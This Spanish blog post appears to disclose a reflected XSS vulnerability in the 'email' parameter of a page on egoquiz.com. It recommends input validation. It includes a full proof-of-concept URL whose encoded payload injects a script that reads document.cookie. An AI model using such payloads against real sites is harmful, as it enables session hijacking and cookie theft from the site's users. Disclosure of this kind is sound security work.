
En el sitio egoquiz se ha encontrado una vulnerabilidad xss que podría comprometer la integridad de los datos del servidor mediante un simple ataque como este:
Ejemplo:
http://www.egoquiz.com/listoRestaurarListaNegra.php?email=%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3B%3C%2F%73%63%72%69%70%74%3E
Previsualización.
Recomendación:
Validar inmediatamente las entradas a la variable email de la pagina listoRestaurarListaNegra.php
Saludos
No hay comentarios.:
Publicar un comentario
Déjanos tu comentario, nos permitirá mejorar.
¿Qué opinas de este tema?
¿Tienes alguna duda o sugerencia?
¿Te parece adecuado y completo este tema?
¿Falta información? ¿Cual?